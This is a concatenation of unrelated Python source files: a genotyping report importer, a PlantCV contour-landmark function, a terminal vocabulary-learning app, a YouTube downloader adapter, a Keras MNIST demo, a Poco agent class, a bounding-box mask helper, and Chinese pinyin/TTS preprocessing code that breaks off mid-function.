curr_sample_chr['allele1_fwds'][snp_index] = allele1_fwd
curr_sample_chr['allele2_fwds'][snp_index] = allele2_fwd
else:
curr_sample['unannotated_snps'].append({
'snp_name': snp_name,
'x': x,
'y': y,
'allele1_fwd': allele1_fwd,
'allele2_fwd': allele2_fwd,
})
save_sample(curr_sample)
def main():
# parse command line arguments
parser = argparse.ArgumentParser(description='import the final report with probe intensities')
parser.add_argument(
'--generate-ids',
action='store_true',
help='this option indicates that the "Sample ID" column should be treated as a non-canonical identifier and '
'a canonical ID will be automatically generated for each sample',
)
parser.add_argument(
'--on-duplicate',
choices=['halt', 'skip', 'replace'],
help='this option is only meaningful if --canonical-ids is also set. This indicates what action to take if a '
'duplicate canonical ID is encountered during import: halt the import process with an error message, '
'skip the sample with a warning message or replace the existing sample with a warning',
)
parser.add_argument(
'platform',
help='the platform for the data we are importing. eg: MegaMUGA')
parser.add_argument(
'final_report',
help='the final report file as exported by GenomeStudio Genotyping Module. This report must '
'be tab separated, must be in the "Standard" format and must contain '
'at least the following columns: '
'SNP Name, Sample ID, X, Y, Allele1 - Forward, Allele2 - Forward')
parser.add_argument(
'sample_annotation_txt',
nargs='*',
help='an (optional) tab-delimited sample annotation file. There should be a header row and one row per sample')
args = parser.parse_args()
sample_anno_dicts = dict()
for sample_anno_filename in args.sample_annotation_txt:
curr_dicts = sai.sample_anno_dicts(sample_anno_filename)
sample_anno_dicts = sai.merge_dicts(sample_anno_dicts, curr_dicts)
report_name = splitext(basename(args.final_report))[0]
import_final_report(
args.generate_ids,
args.on_duplicate,
args.final_report,
sample_anno_dicts,
args.platform,
[report_name, args.platform],
mds.init_db())
if __name__ == '__main__':
main()
|
# Identify landmark positions within a contour for morphometric analysis
import numpy as np
import math
import cv2
from plantcv.plantcv import params
from plantcv.plantcv._debug import _debug
def acute(img, obj, mask, win, threshold):
"""
Identify landmark positions within a contour for morphometric analysis
Inputs:
img = Original image used for plotting purposes
obj = An opencv contour array of interest to be scanned for landmarks
mask = binary mask used to generate contour array (necessary for ptvals)
win = maximum cumulative pixel distance window for calculating angle
score; 1 cm in pixels often works well
threshold = angle score threshold to be applied for mapping out landmark
coordinate clusters within each contour
Outputs:
homolog_pts = pseudo-landmarks selected from each landmark cluster
start_pts = pseudo-landmark island starting position; useful in parsing homolog_pts in downstream analyses
stop_pts = pseudo-landmark island end position ; useful in parsing homolog_pts in downstream analyses
ptvals = average values of pixel intensity from the mask used to generate cont;
useful in parsing homolog_pts in downstream analyses
chain = raw angle scores for entire contour, used to visualize landmark
clusters
verbose_out = supplemental file which stores coordinates, distance from
landmark cluster edges, and angle score for entire contour. Used
in troubleshooting.
:param img: numpy.ndarray
:param obj: numpy.ndarray
:param mask: numpy.ndarray
:param win: int
:param threshold: int
:return homolog_pts:
"""
chain = [] # Create empty chain to store angle scores
for k in list(range(len(obj))): # Coordinate-by-coordinate 3-point assignments
vert = obj[k]
dist_1 = 0
for r in range(len(obj)): # Reverse can to obtain point A
rev = k - r
pos = obj[rev]
dist_2 = np.sqrt(np.square(pos[0][0]-vert[0][0])+np.square(pos[0][1]-vert[0][1]))
if r >= 2:
if (dist_2 > dist_1) & (dist_2 <= win): # Further from vertex than current pt A while within window?
dist_1 = dist_2
pt_a = pos # Load best fit within window as point A
elif dist_2 > win:
break
else:
pt_a = pos
dist_1 = 0
for f in range(len(obj)): # Forward scan to obtain point B
fwd = k + f
if fwd >= len(obj):
fwd -= len(obj)
pos = obj[fwd]
dist_2 = np.sqrt(np.square(pos[0][0]-vert[0][0])+np.square(pos[0][1]-vert[0][1]))
if f >= 2:
if (dist_2 > dist_1) & (dist_2 <= win): # Further from vertex than current pt B while within window?
dist_1 = dist_2
pt_b = pos # Load best fit within window as point B
elif dist_2 > win:
break
else:
pt_b = pos
# Angle in radians derived from Law of Cosines, converted to degrees
p12 = np.sqrt((vert[0][0]-pt_a[0][0])*(vert[0][0]-pt_a[0][0])+(vert[0][1]-pt_a[0][1])*(vert[0][1]-pt_a[0][1]))
p13 = np.sqrt((vert[0][0]-pt_b[0][0])*(vert[0][0]-pt_b[0][0])+(vert[0][1]-pt_b[0][1])*(vert[0][1]-pt_b[0][1]))
p23 = np.sqrt((pt_a[0][0]-pt_b[0][0])*(pt_a[0][0]-pt_b[0][0])+(pt_a[0][1]-pt_b[0][1])*(pt_a[0][1]-pt_b[0][1]))
dot = (p12*p12 + p13*p13 - p23*p23)/(2*p12*p13)
# Used a random number generator to test if either of these cases were possible but neither is possible
# if dot > 1: # If float exceeds 1 prevent arcos error and force to equal 1
# dot = 1
# elif dot < -1: # If float exceeds -1 prevent arcos error and force to equal -1
# dot = -1
ang = math.degrees(math.acos(dot))
# print(str(k)+' '+str(dot)+' '+str(ang))
chain.append(ang)
index = [] # Index chain to find clusters below angle threshold
for c, link in enumerate(chain): # Identify links in chain with acute angles
if float(link) <= threshold:
index.append(c) # Append positions of acute links to index
# acute_pos = obj[index] # Extract all island points blindly
#
# float(len(acute_pos)) / float(len(obj)) # Proportion of informative positions
if len(index) != 0:
isle = []
island = []
for ind in index: # Scan for iterative links within index
if not island:
island.append(ind) # Initiate new link island
elif island[-1]+1 == ind:
island.append(ind) # Append successful iteration to island
elif island[-1]+1 != ind:
pt_a = obj[ind]
pt_b = obj[island[-1]+1]
dist = np.sqrt(np.square(pt_a[0][0]-pt_b[0][0])+np.square(pt_a[0][1]-pt_b[0][1]))
if win/2 > dist:
island.append(ind)
else:
isle.append(island)
island = [ind]
isle.append(island)
if len(isle) > 1:
if (isle[0][0] == 0) & (isle[-1][-1] == (len(chain)-1)):
if params.debug is not None:
print('Fusing contour edges')
island = isle[-1]+isle[0] # Fuse overlapping ends of contour
# Delete islands to be spliced if start-end fusion required
del isle[0]
del isle[-1]
isle.insert(0, island) # Prepend island to isle
else:
if params.debug is not None:
print('Microcontour...')
# Homologous point maximum distance method
pt = []
vals = []
maxpts = []
ss_pts = []
ts_pts = []
ptvals = []
max_dist = [['cont_pos', 'max_dist', 'angle']]
for island in isle:
# Identify if contour is concavity/convexity using image mask
pix_x, pix_y, w, h = cv2.boundingRect(obj[island]) # Obtain local window around island
for c in range(w):
for r in range(h):
# Identify pixels in local window internal to the island hull
pos = cv2.pointPolygonTest(obj[island], (pix_x+c, pix_y+r), 0)
if 0 < pos:
vals.append(mask[pix_y+r][pix_x+c]) # Store pixel value if internal
if len(vals) > 0:
ptvals.append(sum(vals)/len(vals))
vals = []
else:
ptvals.append('NaN') # If no values can be retrieved (small/collapsed contours)
vals = []
# Identify pixel coordinate to use as pseudolandmark for island
# if len(isle[x]) == 1: # If landmark is a single point (store position)
# if debug == True:
# print('route A')
# pt = isle[x][0]
# max_dist.append([isle[x][0], '-', chain[isle[x][0]]])
# # print pt
# elif len(isle[x]) == 2: # If landmark is a pair of points (store more acute position)
# if debug == True:
# print('route B')
# pt_a = chain[isle[x][0]]
# pt_b = chain[isle[x][1]]
# print(pt_a, pt_b)
# if pt_a == pt_b:
# pt = isle[x][0] # Store point A if both are equally acute
# max_dist.append([isle[x][0], '-', chain[isle[x][0]]])
# elif pt_a < pt_b:
# pt = isle[x][0] # Store point A if more acute
# max_dist.append([isle[x][0], '-', chain[isle[x][0]]])
# elif pt_a > pt_b:
# pt = isle[x][1] # Store point B if more acute
# max_dist.append([isle[x][1], '-', chain[isle[x][1]]])
# print pt
if len(island) >= 3: # If landmark is multiple points (distance scan for position)
if params.debug is not None:
print('route C')
ss = obj[island[0]] # Store isle "x" start site
ts = obj[island[-1]] # Store isle "x" termination site
dist_1 = 0
for d in island: # Scan from ss to ts within isle "x"
site = obj[[d]]
ss_d = np.sqrt(np.square(ss[0][0] - site[0][0][0]) + np.square(ss[0][1] - site[0][0][1]))
ts_d = np.sqrt(np.square(ts[0][0] - site[0][0][0]) + np.square(ts[0][1] - site[0][0][1]))
# Current mean distance of 'd' to 'ss' & 'ts'
dist_2 = np.mean([np.abs(ss_d), np.abs(ts_d)])
max_dist.append([d, dist_2, chain[d]])
if dist_2 > dist_1: # Current mean distance better fit that previous best?
pt = d
dist_1 = dist_2 # Current mean becomes new best mean
# print pt
if params.debug is not None:
print(f"Landmark site: {pt}, Start site: {island[0]}, Term. site: {island[-1]}")
maxpts.append(pt) # Empty 'pts' prior to next mean distance scan
ss_pts.append(island[0])
ts_pts.append(island[-1])
if params.debug is not None:
print(f'Landmark point indices: {maxpts}')
print(f'Starting site indices: {ss_pts}')
print(f'Termination site indices: {ts_pts}')
homolog_pts = obj[maxpts]
start_pts = obj[ss_pts]
stop_pts = obj[ts_pts]
ori_img = np.copy(img)
# Convert grayscale images to color
if len(np.shape(ori_img)) == 2:
ori_img = cv2.cvtColor(ori_img, cv2.COLOR_GRAY2BGR)
# Draw acute points on the original image
cv2.drawContours(ori_img, homolog_pts, -1, (255, 255, 255), params.line_thickness)
# print/plot debug image
_debug(visual=ori_img, filename=f"{params.device}_acute_plms.png")
return homolog_pts, start_pts, stop_pts, ptvals, chain, max_dist
else:
return [], [], [], [], [], []
|
__author__ = "Radek Warowny"
__licence__ = "GPL"
__version__ = "1.0.1"
__maintainer__ = "Radek Warowny"
__email__ = "radekwarownydev@gmail.com"
__status__ = "Demo"
import getpass
import math
import sqlite3
import pandas as pd
import os
import shutil
import sys
import time
from db import db_conn, check_user, insert_word
words = [] # list of words typed in current session
def print_centre(s):
print(s.center(shutil.get_terminal_size().columns))
def logo():
print_centre('░██████╗░░█████╗░██╗░░░░░██████╗░ ██╗░░░░░██╗░██████╗████████╗')
print_centre('██╔════╝░██╔══██╗██║░░░░░██╔══██╗ ██║░░░░░██║██╔════╝╚══██╔══╝')
print_centre('██║░░██╗░██║░░██║██║░░░░░██║░░██║ ██║░░░░░██║╚█████╗░░░░██║░░░')
print_centre('██║░░╚██╗██║░░██║██║░░░░░██║░░██║ ██║░░░░░██║░╚═══██╗░░░██║░░░')
print_centre('╚██████╔╝╚█████╔╝███████╗██████╔╝ ███████╗██║██████╔╝░░░██║░░░')
print_centre('░╚═════╝░░╚════╝░╚══════╝╚═════╝░ ╚══════╝╚═╝╚═════╝░░░░╚═╝░░░')
print_centre("𝕓𝕪 ℝ𝕒𝕕𝕖𝕜 PRESS q to QUIT")
def introduction():
os.system('clear')
print_centre("Struggling with learning a foreign language? ")
time.sleep(1)
print_centre("Tired of flashcards and memorising glossaries? ")
time.sleep(1)
print_centre("If so, the GOLD LIST method may help.")
time.sleep(1)
print_centre("PRESS ANY KEY")
input()
os.system('clear')
print()
print_centre(" +-------------------------+ +--------------------------+")
print_centre(" | | | |")
print_centre(" | ---> |")
print_centre(" | | | |")
print_centre(" | | | 1st DISTILLATION |")
print_centre(" | MAIN LIST | | 17 WORDS |")
print_centre(" | 25 WORDS | | |")
print_centre(" | | | |")
print_centre(" | | | |")
print_centre(" | ▲ | +----------------------|---+")
print_centre(" +---|---------------------+ +----------------------|---+")
print_centre(" +---|---------------------+ | ▼ |")
print_centre(" | | | |")
print_centre(" | | | 2nd DISTILLATION |")
print_centre(" | 3rd DISTILLATION | | 11 WORDS |")
print_centre(" | 7 WORDS <--- |")
print_centre(" | | | |")
print_centre(" | | | |")
print_centre(" +-------------------------+ +--------------------------+")
print()
print_centre("You start by typing words from the dictionary.")
time.sleep(1)
print_centre("Then you wait for at least two weeks to find out")
time.sleep(1)
print_centre("that you almost miraculously remembered 30% words")
time.sleep(1)
print_centre("from each list. All thanks to the power of moving information")
time.sleep(1)
print_centre("from short to long-term memory")
time.sleep(1)
print_centre("PRESS ANY KEY")
input()
os.system('clear')
def login_interface():
os.system('clear')
logo() # application logo
try:
print_centre('USERNAME: ')
username = input(''.center(112))
if username == 'q':
print_centre("PROGRAM TERMINATES")
time.sleep(1)
sys.exit()
print_centre('PASSWORD: ')
password = getpass.getpass(''.center(112)) # getpass renders input invisible
from db import check_user, create_user, insert_word, db_conn
if not username or not password:
print_centre('INVALID INPUT')
else:
if not check_user(password)[1]: # CREATE ACCOUNT INTERFACE
print_centre('CREATE ACCOUNT(Y/N): ')
response = getpass.getpass(''.center(112))
if response.lower() != 'y':
print_centre('PROGRAM TERMINATES')
time.sleep(1)
sys.exit()
else:
introduction()
create_user(username, password)
check_user(password)
print()
print_centre('PROGRAM STARTS')
print()
time.sleep(1)
else:
pass
return password
except ValueError as e:
print(e)
def dict_load():
# Loads in CSV dictionary file
df = pd.read_csv('en_dict.csv')
df.columns = ['word', 'grammar', 'explanation']
output = df[['word', 'explanation']]
return output
def user_input():
print('\n\n\n')
user_word = input(''.center(90))
if user_word == "":
interface()
elif user_word == 'q':
show_menu()
else:
try:
word = user_word.split(' ', 1)[0]
explanation = user_word.split(' ', 1)[1]
word = word.title()
explanation = explanation.title()
words.append(word)
insert_word(word, explanation, user_id[0])
except IndexError:
print_centre("\n\t\tINPUT MUST NOT BE BLANK.")
time.sleep(2)
interface()
return interface()
def interface():
# Main application interface
# loads in one word - explanation pair from dictionary CSV file
sample = word_explanation.sample(1)
final_word = sample.to_string(index=False, header=False)
word = str(final_word.split(' ')[1])
explanation = ' '.join(final_word.split(' ')[3:])
explanation = str(explanation)
os.system('clear') # clears the screen so interface stays at the top
print_centre("*** 🅆🄾🅁🄳 ********** 🄴🅇🄿🄻🄰🄽🄰🅃🄸🄾🄽 *** PAGE NO {} ***\n".format(count_pages()))
print(', '.join(words))
print_centre('{} --- {}'.format(str(word), str(explanation)))
user_input()
def get_last_word():
# gets last word saved by the by the user
user = (user_id[0],)
conn = sqlite3.connect('goldlist_db.sqlite')
cur = conn.cursor()
cur.execute('SELECT min(word) FROM word_explanation WHERE user_id =?', user)
output = cur.fetchone()[0]
print_centre(output)
cur.close()
conn.close()
# def show_list(n):
#
# # shows all words saved in current session
# os.system('clear')
# user = (user_id[0],)
# conn = sqlite3.connect('goldlist_db.sqlite')
# cur = conn.cursor()
#
# cur.execute('SELECT word FROM word_explanation WHERE user_id =?', user)
# rows = cur.fetchall()
# no = 1
# for row in range(n):
# print("{}. {}".format(no, row[0]))
# no += 1
# count_pages()
# cur.close()
# conn.close()
def count_pages():
# counts all user pages
user = (user_id[0],)
conn = sqlite3.connect('goldlist_db.sqlite')
cur = conn.cursor()
cur.execute('SELECT COUNT(word) FROM word_explanation WHERE user_id =?', user)
number = int(cur.fetchone()[0])
pages = (number / 25) + 1
pages = math.floor(pages)
if pages == 0:
pages = 1
cur.close()
conn.close()
return pages
def show_pages():
os.system('clear')
print()
print_centre('YOU CURRENTLY HAVE {} PAGES.'.format(count_pages()))
print_centre('CHOSE PAGE')
print()
n = int(getpass.getpass(''.center(112)))
# shows all words saved in current session
os.system('clear')
user = (user_id[0],)
conn = sqlite3.connect('goldlist_db.sqlite')
cur = conn.cursor()
cur.execute('SELECT word FROM word_explanation WHERE user_id =?', user)
rows = cur.fetchall()
no = 1
for row in rows:
print("{}. {}".format(no, row[0]))
no += 1
count_pages()
cur.close()
conn.close()
def show_distill():
os.system('clear')
print()
print_centre("YOUR DISTILLED WORDS: ")
def show_dict():
os.system('clear')
print()
print_centre("DICTIONARIES")
print_centre("EN DE FR PL")
print()
print_centre("CURRENT DICTIONARY: EN")
print()
print_centre("(DICTIONARY CHANGE NOT SUPPORTED)")
def show_menu():
os.system('clear')
logo()
print()
print_centre("1. YOUR DICTIONARY")
print_centre("2. YOUR PAGES")
print_centre("3. YOUR DISTILLATIONS")
print_centre("4. YOUR ACCOUNT")
print_centre("PRESS 'S' TO START")
print()
option_input = getpass.getpass(''.center(112))
if option_input == "q":
print_centre('PROGRAM TERMINATES')
time.sleep(1)
sys.exit()
if int(option_input) == 1:
show_dict()
getpass.getpass(''.center(112))
show_menu()
elif int(option_input) == 2:
show_pages()
getpass.getpass(''.center(112))
show_menu()
elif int(option_input) == 3:
show_distill()
getpass.getpass(''.center(112))
show_menu()
elif int(option_input) == 4:
show_account()
getpass.getpass(''.center(112))
show_menu()
elif option_input == "s":
interface()
else:
print("\nINVALID INPUT")
time.sleep(1)
show_menu()
def show_account():
os.system('clear')
logo()
print()
print_centre("ADD NAME: ")
print()
print_centre("PRESS 's' TO START ")
interface()
print()
print_centre(" PRESS 'q' TO QUIT ")
print()
option_input = getpass.getpass(''.center(112))
if option_input == "s":
interface()
elif option_input == "q":
show_menu()
else:
print_centre("INVALID INPUT")
time.sleep(1)
show_account()
db_conn()
user_id = check_user(login_interface())[0]
word_explanation = dict_load() # 2. Loading Dictionary
interface() # 4. Running Program
|
from pathlib import Path
from typing import List, Optional
from youtube_series_downloader.app.download_new_episodes.download_new_episodes_repo import (
DownloadNewEpisodesRepo,
)
from youtube_series_downloader.core.channel import Channel
from youtube_series_downloader.core.video import Video
from youtube_series_downloader.gateways.ffmpeg_gateway import FfmpegGateway
from youtube_series_downloader.gateways.sqlite_gateway import SqliteGateway
from youtube_series_downloader.gateways.youtube_dl_gateway import YoutubeDlGateway
from youtube_series_downloader.gateways.youtube_gateway import YoutubeGateway
class AppAdapter(DownloadNewEpisodesRepo):
def __init__(self) -> None:
self.sqlite_gateway = SqliteGateway()
def close(self) -> None:
self.sqlite_gateway.close()
def get_latest_videos(self, channel: Channel) -> List[Video]:
return YoutubeGateway.get_videos(channel)
def has_downloaded(self, video: Video) -> bool:
return self.sqlite_gateway.has_downloaded(video.id)
def set_as_downloaded(self, channel: Channel, video: Video) -> None:
return self.sqlite_gateway.add_downloaded(channel.name, video.id)
def get_next_episode_number(self, channel: Channel) -> int:
return self.sqlite_gateway.get_next_episode_number(channel.name)
def download(self, video: Video) -> Optional[Path]:
return YoutubeDlGateway.download(video)
def render(self, video: Video, in_file: Path, out_file: Path, speed: float) -> bool:
return FfmpegGateway.render(video, in_file, out_file, speed)
|
#!/usr/bin/python3
# implement TF model which will be used to classify MNIST digits using keras.
#
# Name: R. Melton
# email: rnm@pobox.com
# date: 1/3/2021
# based on: https://www.youtube.com/watch?v=bee0GrKBCrE
# you will need sudo apt install nvidia-cuda-toolkit
import tensorflow as tf
from tensorflow import keras
from matplotlib import pyplot as plt
import numpy as np
import time,sys,os,platform,distro,vers
from tensorflow.python.client import device_lib
#try to install TF 2 if it will run on this HW
# try:
# tensorflow_version #<< this function only exists in google colab VM
# print('installed TF 2.x')
# except Exception:
# print('could not install TF 2')
# pass
if __name__ == '__main__':
vers.show_versions_info()
#see if GPU is available
physical_devices = tf.config.experimental.list_physical_devices('GPU')
print('num GPUs ',len(physical_devices))
# if len(physical_devices) > 0:
# tf.config.experimental.set_memory_growth(physical_devices[0],True)
objects = tf.keras.datasets.mnist # many images of digits 0-9
(training_images, training_labels),(test_images,test_labels) = objects.load_data()
device_lib.list_local_devices()
#print some of the digit images
for i in range(9):
plt.subplot(330+1+i)
plt.imshow(training_images[i])
# print dimensions for training data
print(training_images.shape)
#print 1st training image of one digit
print(training_images[0])
#now normalize all training and test input values to 0 - 1
training_images = training_images / 255.0
test_images = test_images / 255.0
m = tf.keras.models.Sequential([tf.keras.layers.Flatten(input_shape=(28,28)),
tf.keras.layers.Dense(128,activation='relu'),
tf.keras.layers.Dense(10,activation=tf.nn.softmax)])
m.summary() #show summary
m.compile(optimizer = tf.keras.optimizers.Adam(),
loss = 'sparse_categorical_crossentropy',
metrics=['accuracy'])
#train the model
t = time.time()
m.fit(training_images,training_labels,epochs=5,shuffle=True) #5 itterations over all data
print(f'training duration: {time.time() - t}s')
start_test_time = time.time()
m.evaluate(test_images,test_labels)
print(f'test duration: {time.time() - start_test_time}s')
# write out one hot data values so we know what they are.
# test_images.class_indices
#show first image from test data
plt.imshow(test_images[0])
prediction=m.predict(test_images) # do all test images
print('predicted number0: ',np.argmax(prediction[0]))
print(': ',prediction[0])
print('predicted number1: ',np.argmax(prediction[1]))
print(': ',prediction[1])
print('predicted number2: ',np.argmax(prediction[2]))
print(': ',prediction[2])
print('predicted number3: ',np.argmax(prediction[3]))
print(': ',prediction[3])
print('predicted number4: ',np.argmax(prediction[4]))
print(': ',prediction[4])
|
# coding=utf-8
from poco.sdk.interfaces.hierarchy import HierarchyInterface
from poco.sdk.interfaces.input import InputInterface
from poco.sdk.interfaces.screen import ScreenInterface
from poco.sdk.interfaces.command import CommandInterface
__author__ = 'lxn3032'
def _assign(val, default_val):
if isinstance(val, type(None)):
return default_val
else:
return val
class PocoAgent(object):
"""
This is the agent class for poco to communicate with target device.
This class is an aggregation of 4 major interfaces for now.
- :py:class:`HierarchyInterface <poco.sdk.interfaces.hierarchy.HierarchyInterface>`: defines the hierarchy
accessibility methods such as dump(crawl the whole UI tree), getAttr(retrieve attribute value by name)
- :py:class:`InputInterface <poco.sdk.interfaces.input.InputInterface>`: defines the simulated input methods to
allow inject simulated input on target device
- :py:class:`ScreenInterface <poco.sdk.interfaces.screen.ScreenInterface>`: defines methods to access the screen
surface
- :py:class:`CommandInterface <poco.sdk.interfaces.command.CommandInterface>`: defines methods to communicate
with target device in arbitrary way. This is optional.
"""
def __init__(self, hierarchy, input, screen, command=None):
self.hierarchy = _assign(hierarchy, HierarchyInterface())
self.input = _assign(input, InputInterface())
self.screen = _assign(screen, ScreenInterface())
self.command = _assign(command, CommandInterface())
def get_sdk_version(self):
pass
|
from __future__ import absolute_import, division
import networkx as nx
import numpy as np
from scipy.ndimage import binary_dilation, binary_erosion, maximum_filter
from scipy.special import comb
from skimage.filters import rank
from skimage.morphology import dilation, disk, erosion, medial_axis
from sklearn.neighbors import radius_neighbors_graph
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from scipy import ndimage
def find_bbox(mask):
_, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))
return stats[1:] # remove bg stat
def transform_anns(mask, ann_type):
mask_ori = mask.copy()
if ann_type == 'bbox':
bboxs = find_bbox(mask)
for j in bboxs:
cv2.rectangle(mask, (j[0], j[1]), (j[0] + j[2], j[1] + j[3]), 1, -1) # -1->fill; 2->draw_rec
return mask, mask_ori
elif ann_type == 'mask':
return mask, mask_ori
if __name__ == '__main__':
label_path = '2008_001227.png'
mask = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
bboxs = find_bbox(mask)
mask_color = cv2.imread(label_path, cv2.IMREAD_COLOR)
for j in bboxs:
cv2.rectangle(mask_color, (j[0], j[1]), (j[0] + j[2], j[1] + j[3]), (0,255,0), -1)
cv2.imwrite('bbox.png', mask_color)
print('done')
|
# -*- coding: utf-8 -*-
# @Time : 2018/12/10 20:22
# @Author : MengnanChen
# @FileName: transform_pinyin.py
# @Software: PyCharm
import os
import re
import codecs
class words2pinyin:
def __init__(self, path_pinyin=None, path_text=None):
self.path_pinyin = path_pinyin
self.path_text = path_text
def load_pinyinDict(self):
dic = {}
with codecs.open(self.path_pinyin, 'r', encoding='utf8') as f1:
while True:
line = f1.readline()
if len(line) == 0:
break
word, pinyin = line.strip().split('=')
dic[word] = pinyin.split(',')
return dic
def load_text(self):
'''
:return:返回以逗号隔开的文本list ,形如[[...],[...],...]
'''
chars = []
with codecs.open(self.path_text, 'r', encoding='utf8') as f2:
for line in f2.readlines():
chars.append(line.strip().split())
return chars
# 之后有空研究,可以改成python版AC自动机算法来多模式匹配。
def transform(self, text_chars=None, text_file_list=None, use_space=False):
'''
:param text_chars: 能自动识别list还是str,但多行文本要使用text_file_list
:param text_file_list: 多行文本传入,必须要是分词后并用逗号隔开的list格式传入
:param use_space: 结果用空格隔开
:return:文本的拼音list
'''
self.use_space = use_space
pinyin_dic = self.load_pinyinDict()
if type(text_chars) is str:
self.text_chars = [text_chars.split(' ')]
if type(text_chars) is list:
self.text_chars = [text_chars]
if text_file_list:
# 必须是分好词的文本,并以逗号隔开
self.text_chars = text_file_list
if self.path_text:
# 必须要是分词好的文本,并把以逗号隔开的list传入
self.text_chars = self.load_text()
# 正向匹配最大分词算法
# 遍历拼音词典的keys,获得最大词长度(也可理解为最大拼音长度)
max_pinyin = 0
for key in pinyin_dic.keys():
if len(key) > max_pinyin:
max_pinyin = len(key)
# 空列表存储多行文本的拼音结果
self.words = []
# text_chars是分好词的文本,len(text_chars)文本的长度
for j in range(len(self.text_chars)):
# j表示每句话
word = []
for chars in self.text_chars[j]:
# chars表示 分词里面的每个分词
# 临时存储的分词拼音
word_ = []
n = 0
while n < len(chars):
matched = 0
for i in range(max_pinyin, 0, -1):
s = chars[n: n + i] # 截取文本字符串n到n+i位,最后到n+1位
# 判断所截取字符串是否在分词词典和停用词词典内
if s in pinyin_dic:
if len(s) == 1:
# 单字默认提取第一个拼音
pinyin_str = pinyin_dic[s][0]
# word当前最后一个词是拼音而且总长度大于0
if len(word_) > 0:
if chars[n - 1] == '一' and pinyin_str[-1] == str(4):
if not s in '二四六':
word_[-1] = word_[-1][:-1] + str(2)
if chars[n - 1] == '一' and pinyin_str[-1] != str(4):
if not s in '三五七八九十':
word_[-1] = word_[-1][:-1] + str(4)
if chars[n - 1] == '不' and pinyin_str[-1] == str(4):
word_[-1] = word_[-1][:-1] + str(2)
if chars[n - 1] == '不' and pinyin_str[-1] == str(4):
word_[-1] = word_[-1][:-1] + str(4)
word_.append(pinyin_str)
else:
word_.extend(pinyin_dic[s])
matched = 1
n = n + i
break
# 判断标志位是否匹配,不匹配则直接将当前字符输出,然后字位 + 1
if not matched:
word.append(chars[n])
n = n + 1
if len(word_) > 1:
new_word = word_
for j in range(len(new_word) - 1, 0, -1):
i = j - 1
if new_word[j][-1] == str(3) and new_word[i][-1] == str(3):
new_word[i] = new_word[i][:-1] + str(2)
word_ = new_word
word.extend(word_)
if self.use_space:
self.words.append(' '.join(word))
else:
self.words.append(word)
return self.words
def save_result(self, path_save):
pinyin = self.words
text = self.text_chars
assert len(pinyin) == len(text)
with open(path_save, 'w', encoding='utf8') as f3:
if self.use_space:
for i, word in enumerate(pinyin):
f3.write(str("%08d" % i) + ' ' + pinyin[i] + '\n')
else:
for j, word_list in enumerate(pinyin):
f3.write(str("%08d" % j) + ' ' + ' '.join(pinyin[j]) + '\n')
class TacotronPreprocess:
def __init__(self, pinyin_dict_path=os.path.join(os.path.dirname(__file__), 'dependency_data/pinyin.dict')):
# keep symbols in clean_symbols(), some symbols such as '、',';' will be replaced by ','
self._keep_symbols = ['?', '!', '。', ',', '、', ';']
self._word_boundary = '&' # mark word boundary with '&'
self._pinyin_boundary = ' ' # the requirement mark by pinyin
self._prosody_mark = ['#', '*', '$', '%']
_wb = self._word_boundary
_pb = self._pinyin_boundary
_pm1, _pm3 = self._prosody_mark[0], self._prosody_mark[2]
self._replacement_expression = [(re.compile('{}'.format(x[0]), re.IGNORECASE), x[1]) for x in [
('{},{}'.format(_wb, _wb), '{}{}{},{}'.format(_pb, _pm3, _pb, _pb)),
('{}。{}'.format(_wb, _wb), '{}{}{}。{}'.format(_pb, _pm3, _pb, _pb)),
('{}!{}'.format(_wb, _wb), '{}{}{}!{}'.format(_pb, _pm3, _pb, _pb)),
('{}?{}'.format(_wb, _wb), '{}{}{}?{}'.format(_pb, _pm3, _pb, _pb)),
('{}、{}'.format(_wb, _wb), '{}{}{},{}'.format(_pb, _pm3, _pb, _pb)),
('{};{}'.format(_wb, _wb), '{}{}{},{}'.format(_pb, _pm3, _pb, _pb)),
(self._word_boundary, '{}{}{}'.format(_pb, _pm1, _pb)),
]]
self._number_expression = [(re.compile('{}'.format(x[0]), re.IGNORECASE), x[1]) for x in [
('(?P<value>\d+年)', self.number2chinese_utils), # 1996年
('(?P<value>\$\d+(\.\d+))', self.number2chinese_utils), # $12.5
('(?P<value>\¥\d+(\.\d+))', self.number2chinese_utils), # ¥12.5
('(?P<value>\d+(\.\d+)%)', self.number2chinese_utils), # 12.5%
('(?P<value>\d+(\.\d+))', self.number2chinese_utils), # 123.4
('(?P<value>\d+/\d+)', self.number2chinese_utils), # 10/13
('(?P<value>\d+)', self.number2chinese_utils), # 123
('W', '万'),
('w', '万'),
('K', '千'),
('k', '千'),
('-', '至'),
('~', '至'),
('/', '每'),
('°', '度'),
('’', '分'),
('<', '小于'),
('\+', '加'),
]]
self._pinyin_dict_path = pinyin_dict_path
def _is_chinese_char(self, cp):
# check cp is chinese or not
cp = ord(cp)
if ((cp >= 0x4E00 and cp <= 0x9FFF) or
(cp >= 0x3400 and cp <= 0x4DBF) or
(cp >= 0x20000 and cp <= 0x2A6DF) or
(cp >= 0x2A700 and cp <= 0x2B73F) or
(cp >= 0x2B740 and cp <= 0x2B81F) or
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or
(cp >= 0x2F800 and cp <= 0x2FA1F)):
return True
return False
def _e2c_punctuation(self, text):
# translate english punctuation to chinese punctuation
e_pun = u',.!?[]()<>"\''
c_pun = u',。!?【】()《》“‘'
table = {ord(f): ord(t) for f, t in zip(e_pun, c_pun)}
return text.translate(table)
def clean_symbols(self, input_path, output_path):
# clean symbol in text, allow symbols in self._keep_symbols and '、',';' etc will be replaced by ','
with open(input_path, 'rb') as fin, open(output_path, 'wb') as fout:
for line in fin:
line = line.decode('utf-8').strip('\r\n ')
line = self._e2c_punctuation(line) # translate english symbols to chinese symbols
line_t = []
for char in line:
if self._is_chinese_char(char) \
or char in self._keep_symbols \
or char.isdigit() \
or char.isalnum() \
or char == ' ':
line_t.append(char)
line = '{}\n'.format(''.join(line_t))
fout.write(line.encode('utf-8'))
def _independence_number2chinese(self, number: str):
# translate arabic to independent chinese
number = number.strip('\r\n ')
if len(number) < 1 or not number.isdigit():
return ''
digit_to_chi = {
'0': '零',
'1': '一',
'2': '二',
'3': '三',
'4': '四',
'5': '五',
'6': '六',
'7': '七',
'8': '八',
'9': '九',
}
result = [digit_to_chi[n] for n in number]
return ''.join(result)
def _integer_number2chinese(self, number: str):
# translate intergral number into chinese, only support to 999,9999(max: 999,9999,9999)
number = number.strip('\r\n ')
try:
number = int(number)
except:
return ''
